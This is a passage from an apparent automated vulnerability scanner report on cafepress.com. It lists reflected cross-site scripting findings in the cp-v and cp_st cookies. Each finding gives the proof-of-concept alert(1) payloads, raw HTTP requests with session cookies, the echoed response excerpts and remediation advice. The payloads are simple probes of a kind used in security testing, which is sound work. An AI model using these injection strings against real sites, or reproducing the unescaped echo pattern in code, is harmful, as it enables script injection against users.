Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd8dde"-alert(1)-"0740f775c1c ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 112228 Date: Sun, 26 Dec 2010 13:48:09 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 112228 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd8dde"-alert(1)-"0740f775c1c "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.117. http://www.cafepress.com/make/custom-t-shirts [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-t-shirts
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ba57</script><script>alert(1)</script>0e63e38f264 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-t-shirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=8ba57</script><script>alert(1)</script>0e63e38f264 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 112251 Date: Sun, 26 Dec 2010 13:48:03 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 112251 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '8ba57</script><script>alert(1)</script>0e63e38f264 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.118. http://www.cafepress.com/make/custom-thermos [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-thermos
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eea1"-alert(1)-"d0c14b83f86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA8eea1"-alert(1)-"d0c14b83f86 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 55394 Date: Sun, 26 Dec 2010 13:48:17 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55394 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8eea1"-alert(1)-"d0c14b83f86 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.119. http://www.cafepress.com/make/custom-thermos [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-thermos
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc081</script><script>alert(1)</script>a5d7c25c9aa was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=cc081</script><script>alert(1)</script>a5d7c25c9aa ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 55416 Date: Sun, 26 Dec 2010 13:48:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55416 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'cc081</script><script>alert(1)</script>a5d7c25c9aa ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.120. http://www.cafepress.com/make/custom-water-bottles [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-water-bottles
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67f7b"-alert(1)-"cf8efdc4007 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA67f7b"-alert(1)-"cf8efdc4007 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 58828 Date: Sun, 26 Dec 2010 13:48:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58828 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA67f7b"-alert(1)-"cf8efdc4007 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.121. http://www.cafepress.com/make/custom-water-bottles [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-water-bottles
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bca4a</script><script>alert(1)</script>d8d616836de was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=bca4a</script><script>alert(1)</script>d8d616836de ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
